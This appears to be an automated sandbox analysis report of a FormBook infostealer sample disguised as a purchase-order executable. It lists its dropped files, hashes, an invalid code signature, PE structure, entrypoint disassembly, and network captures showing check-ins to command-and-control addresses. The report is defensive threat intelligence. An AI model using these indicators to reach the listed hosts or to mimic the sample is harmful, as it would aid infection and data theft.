	Ordine_doc_419024001904.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	91.195.240.117
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Users\user\Desktop\PO0423023.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\43PI9J

Download File

Process:	C:\Windows\SysWOW64\takeown.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.977042725724703
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO0423023.exe
File size:	705'032 bytes
MD5:	c7bebfd0af94c40da20ce3639251c688
SHA1:	bbe1339a4a15e7c7c9c0e68d2f3b8655c7c0780c
SHA256:	cc4eb6b1d8a54f9ad9c8483ba7ac4a141db452a40299719090ff7b1878047063
SHA512:	fc8d92911dd16d0e88d868023c74d020835aed8b561e250f3a2819692fdb7537e3d2dc484c0e6fbee9de8ef4773f53adcb4cb40e0c27318758d767ff7a855ce6
SSDEEP:	12288:JcK1ZNZRAE5gX3v8BDC01YzIcjugwvU1ju2Go3/R0H4l1TwjjQkAh7xPKhLsp2p+:/ll2X3v85lYSUjl3/R0aTwjbAh7E+p28
TLSH:	14E423880390B712D62A1BF3D2E0621C83B06137DAF3CC48ADD661E7EDC5751AB5679B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$'f..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4a9f12
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x662724BD [Tue Apr 23 03:02:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
dec edx
inc ecx
xor dh, byte ptr [41303547h]
inc edx
inc ecx
xor al, 47h
add byte ptr [eax], al
add byte ptr [eax], al
inc ebp
aaa
inc esi
cmp byte ptr [eax], bh
push edx
aaa
dec eax
inc edi
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa9ebd	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaa000	0x694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa8c00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa85cc	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa7f38	0xa8000	754280bef17f3e25e2d045757244f418	False	0.9785475957961309	data	7.9832865551635095	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xaa000	0x694	0x800	77c6ed1753ae0f428ac35abe01300e24	False	0.3671875	data	3.6266373436343917	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xc	0x200	ddd4d71d88f4c6d6e97245be0e53ef35	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xaa090	0x404	data			0.4280155642023346
RT_MANIFEST	0xaa4a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/23/24-08:38:47.457495	TCP	2856318	ETPRO TROJAN FormBook CnC Checkin (POST) M4	49721	80	192.168.2.5	91.195.240.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 08:38:26.495451927 CEST	49720	80	192.168.2.5	47.76.62.167
Apr 23, 2024 08:38:26.802499056 CEST	80	49720	47.76.62.167	192.168.2.5
Apr 23, 2024 08:38:26.802660942 CEST	49720	80	192.168.2.5	47.76.62.167
Apr 23, 2024 08:38:26.805083990 CEST	49720	80	192.168.2.5	47.76.62.167
Apr 23, 2024 08:38:27.111741066 CEST	80	49720	47.76.62.167	192.168.2.5
Apr 23, 2024 08:38:27.112227917 CEST	80	49720	47.76.62.167	192.168.2.5
Apr 23, 2024 08:38:27.112334013 CEST	80	49720	47.76.62.167	192.168.2.5
Apr 23, 2024 08:38:27.112356901 CEST	80	49720	47.76.62.167	192.168.2.5
Apr 23, 2024 08:38:27.112375975 CEST	80	49720	47.76.62.167	192.168.2.5
Apr 23, 2024 08:38:27.112406015 CEST	49720	80	192.168.2.5	47.76.62.167
Apr 23, 2024 08:38:27.112701893 CEST	49720	80	192.168.2.5	47.76.62.167
Apr 23, 2024 08:38:27.119360924 CEST	49720	80	192.168.2.5	47.76.62.167
Apr 23, 2024 08:38:27.426116943 CEST	80	49720	47.76.62.167	192.168.2.5
Apr 23, 2024 08:38:47.279443026 CEST	49721	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:47.454773903 CEST	80	49721	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:47.454902887 CEST	49721	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:47.457494974 CEST	49721	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:47.634747982 CEST	80	49721	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:47.634798050 CEST	80	49721	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:47.634846926 CEST	49721	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:48.968067884 CEST	49721	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:50.043004036 CEST	49722	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:50.218280077 CEST	80	49722	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:50.218403101 CEST	49722	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:51.333786011 CEST	49722	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:51.509423971 CEST	80	49722	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:51.509452105 CEST	80	49722	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:51.509526014 CEST	49722	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:52.844083071 CEST	49722	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:53.861623049 CEST	49723	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:54.036622047 CEST	80	49723	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:54.036864042 CEST	49723	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:54.043353081 CEST	49723	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:54.218204975 CEST	80	49723	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:54.218992949 CEST	80	49723	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:54.219033957 CEST	80	49723	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:54.219101906 CEST	49723	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:55.561948061 CEST	49723	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:56.581417084 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:56.756742954 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:56.756925106 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:56.759449005 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:56.975423098 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670466900 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670533895 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670572042 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670609951 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670648098 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670644999 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.670685053 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670717001 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.670723915 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670739889 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.670763016 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670799017 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670815945 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.670836926 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.670888901 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.845993996 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846016884 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846035957 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846095085 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.846180916 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846236944 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.846318007 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846390963 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846438885 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.846484900 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846596003 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846640110 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.846757889 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:38:57.846887112 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:57.849293947 CEST	49724	80	192.168.2.5	91.195.240.19
Apr 23, 2024 08:38:58.024454117 CEST	80	49724	91.195.240.19	192.168.2.5
Apr 23, 2024 08:39:03.241902113 CEST	49725	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:03.418302059 CEST	80	49725	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:03.418418884 CEST	49725	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:03.420443058 CEST	49725	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:03.596137047 CEST	80	49725	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:03.596160889 CEST	80	49725	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:03.596231937 CEST	49725	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:04.936810017 CEST	49725	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:05.956312895 CEST	49726	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:06.131900072 CEST	80	49726	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:06.132047892 CEST	49726	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:06.134567976 CEST	49726	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:06.312479019 CEST	80	49726	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:06.312546015 CEST	80	49726	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:06.312686920 CEST	49726	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:07.639914036 CEST	49726	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:09.325862885 CEST	49727	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:09.500940084 CEST	80	49727	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:09.501046896 CEST	49727	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:09.549199104 CEST	49727	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:09.726011992 CEST	80	49727	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:09.727941990 CEST	80	49727	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:09.728094101 CEST	80	49727	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:09.728152037 CEST	49727	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:11.061938047 CEST	49727	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.086896896 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.261989117 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.262110949 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.263885021 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.478893042 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810312986 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810364008 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810401917 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810437918 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810473919 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810477972 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.810508966 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810517073 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.810547113 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810563087 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.810581923 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810617924 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810635090 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.810653925 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.810700893 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.985510111 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985538960 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985563040 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985579014 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985595942 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985611916 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985630035 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985646009 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985656023 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.985662937 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:12.985688925 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.985806942 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:12.988318920 CEST	49728	80	192.168.2.5	91.195.240.123
Apr 23, 2024 08:39:13.163248062 CEST	80	49728	91.195.240.123	192.168.2.5
Apr 23, 2024 08:39:18.269344091 CEST	49729	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:18.444418907 CEST	80	49729	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:18.444567919 CEST	49729	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:18.446669102 CEST	49729	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:18.622351885 CEST	80	49729	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:18.622411966 CEST	80	49729	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:18.622474909 CEST	49729	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:19.952518940 CEST	49729	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:20.970798969 CEST	49730	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:21.146440983 CEST	80	49730	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:21.146533966 CEST	49730	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:21.148345947 CEST	49730	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:21.324069023 CEST	80	49730	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:21.324136019 CEST	80	49730	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:21.324228048 CEST	49730	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:22.655507088 CEST	49730	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:23.675117016 CEST	49731	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:23.850488901 CEST	80	49731	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:23.850658894 CEST	49731	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:23.855096102 CEST	49731	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:24.030406952 CEST	80	49731	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:24.031277895 CEST	80	49731	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:24.031317949 CEST	80	49731	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:24.031554937 CEST	49731	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:25.375309944 CEST	49731	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:26.820611954 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:26.995699883 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:26.995873928 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.013578892 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.229221106 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548019886 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548062086 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548077106 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548108101 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548121929 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548140049 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.548156977 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548171043 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548182964 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.548203945 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.548227072 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548263073 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548304081 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.548317909 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.548357964 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.723423958 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723505974 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723545074 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723579884 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.723583937 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723639965 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.723649979 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723774910 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723813057 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723822117 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.723853111 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723891020 CEST	80	49732	91.195.240.117	192.168.2.5
Apr 23, 2024 08:39:27.723896027 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.724061966 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.727554083 CEST	49732	80	192.168.2.5	91.195.240.117
Apr 23, 2024 08:39:27.902605057 CEST	80	49732	91.195.240.117	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 08:38:25.948117018 CEST	63994	53	192.168.2.5	1.1.1.1
Apr 23, 2024 08:38:26.488770962 CEST	53	63994	1.1.1.1	192.168.2.5
Apr 23, 2024 08:38:47.175105095 CEST	56972	53	192.168.2.5	1.1.1.1
Apr 23, 2024 08:38:47.277105093 CEST	53	56972	1.1.1.1	192.168.2.5
Apr 23, 2024 08:39:02.863578081 CEST	59925	53	192.168.2.5	1.1.1.1
Apr 23, 2024 08:39:03.239623070 CEST	53	59925	1.1.1.1	192.168.2.5
Apr 23, 2024 08:39:18.003223896 CEST	61272	53	192.168.2.5	1.1.1.1
Apr 23, 2024 08:39:18.266835928 CEST	53	61272	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
